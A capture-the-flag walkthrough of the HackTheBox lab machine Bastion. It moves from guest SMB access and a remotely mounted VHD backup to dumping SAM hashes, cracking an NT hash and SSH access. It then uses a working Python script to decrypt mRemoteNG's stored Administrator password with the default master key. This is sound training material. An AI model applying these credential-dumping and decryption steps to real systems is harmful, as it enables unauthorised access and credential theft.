As always, start with nmap -sC -sV -oA ./bastion 10.10.10.134
So we have SSH and SMB. The nmap scripts report that SMB message signing is disabled and that guest access looks to be allowed, so we can list and read shares without credentials. Let's see what we can do with it.
Let's look around in the Backups share. Digging through, we eventually come to Backups\windowsimagebackup\l4mpje-pc\Backup 2019-02-22 124351\ and see a lot of XML files and two VHD (Virtual Hard Disk) files. The VHDs are huge.
I start pulling the VHD down for offline analysis and head downstairs for a smoke, because my internet sucks and it's going to take a while. XD I get back from the smoke and the GET has failed. It keeps timing out. No worries. We should be able to mount it remotely instead: mount the Backups share over SMB with CIFS, then point guestmount at the VHD where it sits on the share. For that you'll need libguestfs-tools and cifs-utils, which you can install with:
sudo apt-get install libguestfs-tools
sudo apt-get install cifs-utils
Now that is set, we can create a mount point. Since I am currently in /home/kali/Desktop/Bastion, mkdir remote gives me /home/kali/Desktop/Bastion/remote. I had a little weirdness when I first did it, so I had to unmount and remount it, but surprise! I have mounted the SMB share.
Navigate into the WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351 folder under the mounted share (quote the path, it contains spaces) and we can now use guestmount to mount the VHD. I've made a vhd directory at /home/kali/Desktop/Bastion/vhd, which is four levels up from the backup folder, so the guestmount command is:
guestmount --add ./9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro ../../../../vhd -v
After what seems like forever (every block guestmount touches is being fetched over SMB), the contents of the VHD are available in /home/kali/Desktop/Bastion/vhd. --inspector lets libguestfs find and mount the Windows partition inside the image itself, and --ro makes sure we never write back to the share.
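Because the download kept dying, it is worth being able to tell a complete VHD from a truncated one before spending ages on guestmount. The following is an added example, not code from the post or from libguestfs: it parses the 512-byte footer that every VHD carries at the end of the file (cookie "conectix", disk type, size and a one's-complement checksum) and rejects anything truncated or corrupt. The sample footer it builds for itself is constructed for the demo, not one of the box's images; point check_vhd at a real .vhd path (including one on the CIFS mount) to use it for real.

```python
import os
import struct
import tempfile
import uuid

# Byte layout of the 512-byte VHD footer (all integers big-endian), per the VHD format spec:
#   0  cookie 8 ("conectix") | 8 features 4 | 12 format version 4 | 16 data offset 8
#   24 timestamp 4 | 28 creator app 4 | 32 creator version 4 | 36 creator host OS 4
#   40 original size 8 | 48 current size 8 | 56 geometry 4 | 60 disk type 4
#   64 checksum 4 | 68 unique id 16 | 84 saved state 1 | 85 reserved 427
FOOTER_SIZE = 512
FOOTER_FMT = ">8sIIQI4sI4sQQIII16sB427s"
DISK_TYPES = {2: "fixed", 3: "dynamic", 4: "differencing"}
COOKIE = b"conectix"

def vhd_checksum(footer):
    """One's complement of the byte sum of the footer with the checksum field zeroed."""
    scratch = bytearray(footer)
    scratch[64:68] = b"\x00" * 4
    return (~sum(scratch)) & 0xFFFFFFFF

def parse_footer(footer):
    """Decode a VHD footer, raising ValueError if it is not a consistent one."""
    if len(footer) != FOOTER_SIZE:
        raise ValueError("footer must be exactly %d bytes" % FOOTER_SIZE)
    (cookie, _features, _version, _data_offset, _timestamp, creator_app, _creator_ver,
     _creator_os, _orig_size, cur_size, _geometry, disk_type, checksum, unique_id,
     saved_state, _reserved) = struct.unpack(FOOTER_FMT, footer)
    if cookie != COOKIE:
        raise ValueError("bad cookie %r: not a VHD footer (truncated or wrong file?)" % cookie)
    if checksum != vhd_checksum(footer):
        raise ValueError("footer checksum mismatch: corrupt or incomplete image")
    if disk_type not in DISK_TYPES:
        raise ValueError("unsupported disk type %d" % disk_type)
    return {
        "type": DISK_TYPES[disk_type],
        "size_bytes": cur_size,
        "creator": creator_app.decode("ascii", "replace").strip("\x00 "),
        "uuid": str(uuid.UUID(bytes=unique_id)),
        "saved_state": bool(saved_state),  # saved-state (hibernated) disks should only be mounted ro
    }

def is_valid_footer(footer):
    try:
        parse_footer(footer)
        return True
    except ValueError:
        return False

def check_vhd(path):
    """Parse the last 512 bytes of a file as its VHD footer; only the tail is read, so it is cheap even over CIFS."""
    with open(path, "rb") as fh:
        fh.seek(0, os.SEEK_END)
        size = fh.tell()
        if size < FOOTER_SIZE:
            raise ValueError("file is smaller than a VHD footer")
        fh.seek(size - FOOTER_SIZE)
        return parse_footer(fh.read(FOOTER_SIZE))

def build_footer(size_bytes, disk_type=2):
    """Constructed sample footer (hypothetical disk, not one of the box's VHDs)."""
    raw = struct.pack(FOOTER_FMT, COOKIE, 2, 0x00010000, 0xFFFFFFFFFFFFFFFF, 0, b"py  ",
                      0x00010000, b"Wi2k", size_bytes, size_bytes, 0, disk_type, 0,
                      uuid.uuid4().bytes, 0, b"\x00" * 427)
    return raw[:64] + struct.pack(">I", vhd_checksum(raw)) + raw[68:]

if __name__ == "__main__":
    footer = build_footer(1 << 20)
    with tempfile.NamedTemporaryFile(suffix=".vhd", delete=False) as tmp:
        tmp.write(b"\x00" * (1 << 20) + footer)  # 1 MiB of zeroed disk followed by the footer
    print(check_vhd(tmp.name))
    os.unlink(tmp.name)
```

A partial download fails the cookie check straight away because the last 512 bytes are then disk data rather than the footer; a dynamic VHD also keeps a copy of the footer at offset 0, which is why a truncated dynamic image can still look plausible in a hex editor but will not pass this tail check.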
After digging around for a while, I decided to look at the SAM and SYSTEM registry hives, located at:
From here we can copy the SAM and SYSTEM hives to our working directory (not strictly necessary, but quicker than reading them through the network mount) and run samdump2 SYSTEM SAM on them. samdump2 needs both files: it derives the boot key from SYSTEM and uses it to decrypt the password hashes stored in SAM.
Each line samdump2 prints has the form user:RID:LM hash:NT hash:::. The LM field is the empty-LM placeholder on any modern Windows, so the second hash is the one we want. From there we can drop the 26112010952d963c8dc4217daec986d9 portion of the line for L4mpje into CrackStation (or any of the many other online hash crackers) to get:
Ladies and gents, we have a password. SSH in with ssh L4mpje@10.10.10.134 and that password and we've got ourselves a foothold and the user.txt file on L4mpje's Desktop. Looking around, we find mRemoteNG in the Program Files (x86) folder. mRemoteNG is similar to Microsoft's Remote Desktop Connection Manager (RDCMan). A little Google-Fu again, and we find that mRemoteNG stores the passwords of saved connections in its XML configuration files, encrypted under a master password that falls back to a built-in default when the user never sets one. Look in C:\Users\L4mpje\AppData\Roaming\mRemoteNG and you'll see a dozen files, give or take.
There are a couple of ways to do this next step.
1) You can download mRemoteNG, change the "Protected" value in the XML to "GiUis20DIbnYzWPcdaQKfjE2H5jh//L5v4RGrJMGNXuIq2CttB/d/BxaBP2LwRhY" (which is the value for a blank master password, i.e. the built-in default key), load the file in mRemoteNG and then use External Tools inside mRemoteNG to print out the password.
2) Use or write a script to decrypt the stored passwords. They are encrypted, not hashed, so this is a decryption with the default master password rather than cracking. I used the one at https://github.com/haseebT/mRemoteNG-Decrypt to do it and grabbed the Password string from the Administrator node.
python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
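To see what that script is actually doing, here is the same decryption written out as an added example; it is not the post's code nor the mRemoteNG-Decrypt project's, and it is not mRemoteNG's own source. It assumes the blob layout used by the tool's AES-GCM provider (16-byte salt, 16-byte nonce, ciphertext, 16-byte tag), a key derived with PBKDF2-HMAC-SHA1 over 1000 iterations, and the default master password "mR3m"; the sample input is the Administrator Password string from the post. The AES-GCM step needs either the cryptography package or pycryptodome, which the block imports lazily, so everything except the final decrypt runs with the standard library alone.

```python
import base64
import hashlib

DEFAULT_MASTER_PASSWORD = "mR3m"  # what mRemoteNG uses when no master password was ever set
KDF_ITERATIONS = 1000             # PBKDF2-HMAC-SHA1 -> 32-byte key for AES-256-GCM
SALT_LEN = NONCE_LEN = TAG_LEN = 16

# The Password attribute of the Administrator node, taken from the post.
ADMIN_PASSWORD_BLOB = ("aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHA"
                       "owVRdC7emf7lWWA10dQKiw==")

def split_blob(b64):
    """Base64 blob layout: salt(16) || nonce(16) || AES-GCM ciphertext || tag(16)."""
    raw = base64.b64decode(b64)
    if len(raw) < SALT_LEN + NONCE_LEN + TAG_LEN:
        raise ValueError("blob too short to hold salt, nonce and tag")
    body = raw[SALT_LEN + NONCE_LEN:]
    return raw[:SALT_LEN], raw[SALT_LEN:SALT_LEN + NONCE_LEN], body[:-TAG_LEN], body[-TAG_LEN:]

def derive_key(master_password, salt):
    """Per-blob key: PBKDF2-HMAC-SHA1(master password, salt, 1000 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", master_password.encode("utf-8"), salt,
                               KDF_ITERATIONS, dklen=32)

def _aes_gcm_decrypt(key, nonce, ciphertext, tag, aad):
    try:
        from cryptography.hazmat.primitives.ciphers.aead import AESGCM  # pip install cryptography
        return AESGCM(key).decrypt(nonce, ciphertext + tag, aad)
    except ImportError:
        from Crypto.Cipher import AES  # pycryptodome fallback, as used by the script in the post
        cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
        cipher.update(aad)
        return cipher.decrypt_and_verify(ciphertext, tag)

def decrypt_password(b64, master_password=DEFAULT_MASTER_PASSWORD):
    """Decrypt one Password attribute. The salt doubles as GCM associated data, so a wrong
    master password fails the tag check (InvalidTag / ValueError) instead of yielding garbage."""
    salt, nonce, ciphertext, tag = split_blob(b64)
    key = derive_key(master_password, salt)
    return _aes_gcm_decrypt(key, nonce, ciphertext, tag, salt).decode("utf-8")

if __name__ == "__main__":
    salt, nonce, ciphertext, tag = split_blob(ADMIN_PASSWORD_BLOB)
    # GCM does not pad, so the ciphertext length is the UTF-8 length of the password.
    print("ciphertext is %d bytes, so the password is at most %d characters" % (len(ciphertext), len(ciphertext)))
    print(decrypt_password(ADMIN_PASSWORD_BLOB))
```

If the tag check fails with the default, the user set a real master password and you are back to guessing it (each guess is one PBKDF2 derivation plus one GCM decrypt); pass it as master_password instead. Note that the blob length alone already tells you how long the password is, before you decrypt anything.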
With the Administrator password recovered, SSH to the box as Administrator and grab your flag! Congrats, another one down.